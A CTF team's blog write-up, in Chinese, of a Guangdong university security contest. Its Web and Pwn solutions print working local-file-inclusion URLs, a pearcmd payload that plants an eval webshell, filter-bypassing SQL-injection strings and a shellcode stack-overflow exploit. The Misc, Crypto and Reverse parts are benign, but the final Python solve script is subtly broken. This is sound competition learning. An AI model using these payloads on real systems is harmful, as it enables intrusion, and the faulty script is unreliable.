第二届广东大学生网络安全攻防大赛

队友依旧相当给力,为什么校内校外就我一个fw(哭),我负责Web和Misc的题目
只不过大哥们太强了,每个学校只能进两个队伍,有点可惜

WEB


easy_ctf | SOLVED | Working : E7


#include<cstdio>
#include<cstring>
#include<algorithm>
char s[1000];
int len,a[3][26];
struct Num{
    char s;
    int n;
}b[70];
bool cmp(Num n1,Num n2){
    return n1.n>n2.n;
}
int main(){
    freopen("a.txt","r",stdin);
    scanf("%s",s+1);len=strlen(s+1);
    memset(a,0,sizeof(a));
    for(int i=1;i<=len;i++){
        if(s[i]>='a'&&s[i]<='z')a[0][s[i]-'a']++;
        else if(s[i]>='A'&&s[i]<='Z')a[1][s[i]-'A']++;
        else if(s[i]>='0'&&s[i]<='9')a[2][s[i]-'0']++;
    }
    len=0;
    for(int i=0;i<26;i++){
        ++len;
        b[len].n=a[0][i];
        b[len].s='a'+i;
    }
    for(int i=0;i<26;i++){
        ++len;
        b[len].n=a[1][i];
        b[len].s='A'+i;
    }
    for(int i=0;i<10;i++){
        ++len;
        b[len].n=a[2][i];
        b[len].s='0'+i;
    }
    printf("%d\n",len);
    std::sort(b+1,b+len+1,cmp);
    for(int i=1;i<=len;i++)if(b[i].n>0)printf("%c %d\n",b[i].s,b[i].n);
    for(int i=1;i<=len;i++)if(b[i].n>0)printf("%c",b[i].s);printf("\n");
}

python太麻烦了,c写一份编译给pyexec使用

#encoding=utf8
import re
import os
import json
import time
import urllib
import requests
proxies={
  "http":None,
  "https":None,
}
res=requests.session()
url="http://120.79.191.238:xxx/"
response=res.get(url,proxies=proxies)
while True:
    try:
        text=response.text
        regex=r"(?<=<td style=\"WORD-WRAP: break-word\" width=\"1600\">\s\s)[\w]*(?=<td>)"
        print(text)
        matches=re.search(regex,text,re.MULTILINE)
        with open('a.txt', 'w+') as f:
            print(matches.group(), file=f)
        os.system("a.exe")
        with open('a.out', 'r+') as f:
            ans=f.readline().replace('\n','')
        data={'ans':ans}
        response=res.post(url,data,proxies=proxies)
    except:
        response=res.get(url,proxies=proxies)

很奇怪,就是一直错误,挂了好久才找到一个flag
PS:后期才发现,不是单纯的错误,是因为他除了字母出现次数要排序,相同次数的字母要按ASCLL编码排,怪不得老是错


in | SOLVED | Working : asionm


打开场景后,

打开后随便输入了一个name然后运行,发现结果如下

可以看到这是由get的file参数来传导的,那么有没有可能是利用伪协议呢,结果File为协议可以利用

http://119.23.247.96:40908/action.php?file=file:///etc/passwd

同样filter也可以

http://119.23.247.96:40908/action.php?file=php://filter/read=convert.base64-encode/resource=index.php

源码如下

<!DOCTYPE html>
<html>
<head>
</head>
<body>
    <form action="action.php" method="POST">
    please input your name:<br>
    <input type="text" name="name" >
    <br>
    <input type="submit" value="Submit">
</form> 
</body>
</html>

再探测action.php的

<?php
session_start();
error_reporting(0);
$name = $_POST['name'];
if($name){
    $_SESSION["username"] = $name;
}
include($_GET['file']);
?>
<!DOCTYPE html>
<html>
<head>

再查看1.txt和2.txt的内容,如下所示

本想通过这里是否有线索找到flag路径的,结果没有。尝试/flag结果无反应,思索了很久没有想出来,想到这是利用docker容器的而且这也是文件包含漏洞,那有没有可能要用到pearcmd裸文件包含,按照下面的博客一步步尝试,

https://blog.csdn.net/weixin_45805993/article/details/121659231?ops_request_misc=&request_id=&biz_id=102&utm_term=/tmp/hello.php&utm_medium=distribute.pc_search_result.none-task-blog-2~all~sobaiduweb~default-0-121659231.142^v10^pc_search_result_control_group,157^v4^control&spm=1018.2226.3001.4187

先利用一下下面的payload尝试是否成功,

/action.php?+config-create+/&name=cfile&file=/usr/local/lib/php/pearcmd.php&/<?=eval($_POST['x']);?>+/tmp/hello.php

结果如下成功了,

然后试试蚁剑连接是否成功,

结果失败了,然后一直尝试一直失败,最后发现

这是因为用浏览器直接打的话,会造成编码的问题,然后再用burp尝试了下

再用蚁剑连接,连接成功了,然后flag就在根目录下。


easysql | SOLVED | Working : E7,asionm


原以为是xss,确实可以x,但是一直为待管理员确认,再结合题目easysql,应该是sql注入,重新回到正轨
尝试一波,title处可以注

ac=add&content=&title=3%27-0-%271
ac=add&content=&title=3%27-1-%271

想起在buu上做过一道类似的
https://blog.csdn.net/Zero_Adam/article/details/114031694
不过这道题做了加强,过滤了union、in、空格之类的
过滤了in有点麻烦,不过尝试一波原题的库和表

ac=add&content=&title=3%27-(select/**/exists(select/**/*/**/from/**/web1.users))-%271

可以用!
然后尝试无列名注了一波,这里脚本写得不太好,手动注了几位

ac=add&content=&title=3%27-(select/**/(select '1',concat('admi','n'),'53e2...')<(select/**/*/**/from/**/web1.users/**/limit/**/1))-%271

发现user表有个admin,但根据前几位判断密码是个md5,还不一定能暴破出,尝试有没有flag表

ac=add&content=&title=3%27-(select/**/(select '1','flag{')<(select/**/*/**/from/**/web1.flag/**/limit/**/1))-%271

确实可以,在手动暴几位,幸好是有意义字符串,手动还比较快

ac=add&content=&title=3%27-(select/**/(select '1','flag{sql_1nj3cti0n_1s_s0_easy}')<(select/**/*/**/from/**/web1.flag/**/limit/**/1))-%271

这里没解决大小写问题,但是这里的字母并不多,可以尝试一下,最后flag:flag{Sql_1nj3cti0n_1s_s0_easy}

MISC


复合 | SOLVED | Working : qsdz


导出http对象,得到一大堆文件
很多都是改了后缀的jpg
其中flaggggggg.exe是doc,清除所有格式得到一个Key:everything
pass.md是一个缺少PK的压缩包,解压得到eva

Emklyusg=E2=80=82gni=E2=80=82bvvymlag=E2=80=82tsqic=E2=80=82colz=E2=80=82jx=
moxvl=E2=80=82tiwhz=E2=80=82ebmee,=E2=80=82Zhjeoig=E2=80=82Krpvpi-Zgvlyvx=
=E2=80=82Evdr=E2=80=82or=E2=80=82olv=E2=80=82Rbtm=E2=80=82bl=E2=80=82Gcscck=
h=E2=80=82une=E2=80=82fz=E2=80=82e=E2=80=82tftstrtkdrx=E2=80=82rxeb=E2=80=
=82suv=E2=80=82olfqx=E2=80=82dpb=E2=80=82tizh=E2=80=82km=E2=80=82kliq=E2=80=
=82ox=E2=80=82hsjr:=E2=80=82mom=E2=80=82luyik,=E2=80=82kfx=E2=80=82dwhrh-wi=
=E2=80=82iympwagp,=E2=80=82vru=E2=80=82ral=E2=80=82qzveomvlm.=E2=80=82Aw=E2=
=80=82fgc=E2=80=82olrr=E2=80=82fhvl=E2=80=82nivpkf=E2=80=82vhzr=E2=80=82vvj=
jvqlpwagpn=E2=80=82jrje=E2=80=82pvgu=E2=80=82xcijc=E2=80=82vhbrmsmmvq=E2=80=
=82bz=E2=80=82vbz=E2=80=82xj=E2=80=82jrsea=E2=80=82bukq=E2=80=82wyk=E2=80=
=82kxymye=E2=80=82xj=E2=80=82hvqvyqok=E2=80=82xcid.=E2=80=82Uav=E2=80=82jro=
rb=E2=80=82cfsgn=E2=80=82knt=E2=80=82oisn=E2=80=82uahb=E2=80=82vz=E2=80=82m=
n=E2=80=82pzix=E2=80=82aw=E2=80=82ok=E2=80=82sgh?=E2=80=82Nfh=E2=80=82aznor=
zh=E2=80=82zl=E2=80=82plagkvi=E2=80=82wtgxubvlmx=E2=80=82qvbbjqak=E2=80=82h=
vvvq=E2=80=82gvb=E2=80=82gxc=E2=80=82os=E2=80=82sc=E2=80=82khbvurvp?=E2=80=
=82Wjtn=E2=80=82qf=E2=80=82rmai=E2=80=82zq=E2=80=82yhvggwomt.Ygk=E2=80=82eu=
u=E2=80=82gvyxfm=E2=80=82bx=E2=80=82vt=E2=80=82xci=E2=80=82kylr-weoiixvb=E2=
=80=82btxrxeommc=E2=80=82hm=E2=80=82kbtxzqgmkhzl=E2=80=82siymtggl=E2=80=82k=
nt=E2=80=82xmycw=E2=80=82vsivs=E2=80=82xci=E2=80=82mgkacr=E2=80=82uj=E2=80=
=82kekgxukr?=E2=80=82Kzzr=E2=80=82scyvzr=E2=80=82seiexcw-jiek=E2=80=82mimkg=
taqikw=E2=80=82ns=E2=80=82xpxhbye=E2=80=82migictzmq=E2=80=82zlz=E2=80=82tic=
lzcek,=E2=80=82tccjgvpiay=E2=80=82azvv=E2=80=82dttwhypt=E2=80=82xzkx-kzvbii=
,=E2=80=82xiybumq=E2=80=82zs=E2=80=82nivi=E2=80=82xmnvimzrtw=E2=80=82bu=E2=
=80=82iyr=E2=80=82xcmeel,=E2=80=82jiek=E2=80=82sa=E2=80=82trrblvgy=E2=80=82=
tmsdgglvgrc=E2=80=82vqflz=E2=80=82aprs.=E2=80=82Xj=E2=80=82wlaa=E2=80=82wme=
ysiw,=E2=80=82kfx=E2=80=82apbakcx=E2=80=82fd=E2=80=82kliqorb=E2=80=82e=E2=
=80=82emolt=E2=80=82zgc=E2=80=82nivk=E2=80=82t=E2=80=82wzblpdkrrx=E2=80=82d=
ifzi=E2=80=82jj=E2=80=82kgfl.=E2=80=82Eue=E2=80=82wkieb=E2=80=82avcey=E2=80=
=82vzeuggn=E2=80=82iouyo=E2=80=82ayym=E2=80=82umikv=E2=80=82cegnxumq?=E2=80=
=82Zldw=E2=80=82hsxzbvur=E2=80=82cej=E2=80=82zxlv=E2=80=82rrslyvlmsg=E2=80=
=82ntwriicw=E2=80=82vdrx=E2=80=82xci=E2=80=82pctya=E2=80=82oe=E2=80=82xcsjc=
=E2=80=82pow=E2=80=82hyi=E2=80=82gmkckhbhxi=E2=80=82dr=E2=80=82dcwpknr=E2=
=80=82iyytympwa.=E2=80=82

发现很多=,有可能是quoted-printable编码,解码得到

Emklyusg gni bvvymlag tsqic colz jxmoxvl tiwhz ebmee, Zhjeoig Krpvpi-Zgvlyvx Evdr or olv Rbtm bl Gcscckh une fz e tftstrtkdrx rxeb suv olfqx dpb tizh km kliq ox hsjr: mom luyik, kfx dwhrh-wi iympwagp, vru ral qzveomvlm. Aw fgc olrr fhvl nivpkf vhzr vvjjvqlpwagpn jrje pvgu xcijc vhbrmsmmvq bz vbz xj jrsea bukq wyk kxymye xj hvqvyqok xcid. Uav jrorb cfsgn knt oisn uahb vz mn pzix aw ok sgh? Nfh aznorzh zl plagkvi wtgxubvlmx qvbbjqak hvvvq gvb gxc os sc khbvurvp? Wjtn qf rmai zq yhvggwomt.Ygk euu gvyxfm bx vt xci kylr-weoiixvb btxrxeommc hm kbtxzqgmkhzl siymtggl knt xmycw vsivs xci mgkacr uj kekgxukr? Kzzr scyvzr seiexcw-jiek mimkgtaqikw ns xpxhbye migictzmq zlz ticlzcek, tccjgvpiay azvv dttwhypt xzkx-kzvbii, xiybumq zs nivi xmnvimzrtw bu iyr xcmeel, jiek sa trrblvgy tmsdgglvgrc vqflz aprs. Xj wlaa wmeysiw, kfx apbakcx fd kliqorb e emolt zgc nivk t wzblpdkrrx difzi jj kgfl. Eue wkieb avcey vzeuggn iouyo ayym umikv cegnxumq? Zldw hsxzbvur cej zxlv rrslyvlmsg ntwriicw vdrx xci pctya oe xcsjc pow hyi gmkckhbhxi dr dcwpknr iyytympwa. 

发现有可能是一段文本,用https://www.dcode.fr/chiffre-vigenere得到密钥EVERYTHING(上面得到的key),解密得到

Vigenere  EVERYTHING
(Alphabet (26) ABCDEFGHIJKLMNOPQRSTUVWXYZ)
Arguably the greatest novel ever written about aging, Gabriel Garcia-Marquez Love in the Time of Cholera may be a challenging text for those who need to read it most: the young, the would-be rational, and the impatient. To say that many health care professionals fall into these categories is not to fault them but merely to describe them. Who being young can know what it is like to be old? Who trained in western scientific medicine dares not try to be rational? Flag is life is fantastic.And who caught up in the task-oriented imperative of contemporary medicine can truly claim the virtue of patience? Even before managed-care initiatives so greatly increased the pressure, physicians were famously time-driven, trained to seek efficiency in all things, care of patients prominently among them. To such persons, the thought of reading a novel may seem a profligate waste of time. Why spend hours reading about what never happened? This question has been eloquently answered over the years by those who use literature in medical education. 

发现里面有个Flag is life is fantastic,空格换为_,提交成功

CRYPTO


xor2 | SOLVED | Working : E7,qsdz



def encrypt():
    from secret import flag
    key = "xxxx" # not real key

    cipher = ""
    for i, c in enumerate(flag):
        cipher += chr(ord(c) ^ ord(key[i%4]))

    with open("cipher", "w") as f:
        f.write(cipher)

def decrypt():
    with open("cipher", "r") as f:
        cipher = f.read()
    start = 'flag'
    key = [0]*4
    for i in range(4):
        key[i] = ord(cipher[i]) ^ ord(start[i])
    print(key)
    flag = ''
    for i, c in enumerate(cipher):
        flag += chr(ord(c) ^ key[i % 4])
    print(flag)

decrypt()

PWN


jmp_rsp | SOLVED | Working : micgo


首先拖到Ubuntu环境下,checksec一下

然后拖进IDA查看一下

看到了read函数并且存在栈溢出漏洞,根据题目提示jmp_rsp

可以联想到构造shellcode进行getshell
然后可以利用ROPgadget找到jmp rsp的汇编地址
然后就可以构造exp了

from pwn import *
p=remote("47.106.122.102",47554)
context.arch = 'amd64'
jmp_rsp_addr=0x46d01d
payload=asm(shellcraft.sh())
payload=payload.ljust(0x88, b'a')
payload += p64(jmp_rsp_addr)
payload += asm("lea rax, [rsp-0x90]; jmp rax")
p.send(payload)
p.interactive()

REVERSE


pyre | SOLVED | Working : qsdz,E7


用pyinstxtractor解包,发现1.pyc
用uncomply6反编译,得到1.pc

# uncompyle6 version 3.8.0
# Python bytecode 3.7.0 (3394)
# Decompiled from: Python 3.9.6 (tags/v3.9.6:db3ff76, Jun 28 2021, 15:26:21) [MSC v.1929 64 bit (AMD64)]
# Embedded file name: 1.py

def check():
    a = input('plz input your flag:')
    c = [144, 163, 158, 177, 121, 39, 58, 58, 91, 111, 25, 158, 72, 53, 152, 78, 171, 12, 53, 105, 45, 12, 12, 53, 12, 171, 111, 91, 53, 152, 105, 45, 152, 144, 39, 171, 45, 91, 78, 45, 158, 8]
    if len(a) != 42:
        print('wrong length')
        return 0
    b = 179
    for i in range(len(a)):
        if ord(a[i]) * 33 % b != c[i]:
            print('wrong')
            return

    print('win')

check()
# okay decompiling .\1.pyc

解密脚本

import string

c = [144, 163, 158, 177, 121, 39, 58, 58, 91, 111, 25, 158, 72, 53, 152, 78, 171, 12, 53, 105, 45, 12, 12, 53, 12, 171, 111, 91, 53, 152, 105, 45, 152, 144, 39, 171, 45, 91, 78, 45, 158, 8]
b = 179
for i in range(len(c)):
    for c in string.printable:
        if ord(c) * 33 % b != c[i]:
            print(c, end='')

发布者

正汰

永远是这样,山前面是山,天空上面是天空,道路前面还是道路,迷茫之后还有迷茫。

发表评论

您的电子邮箱地址不会被公开。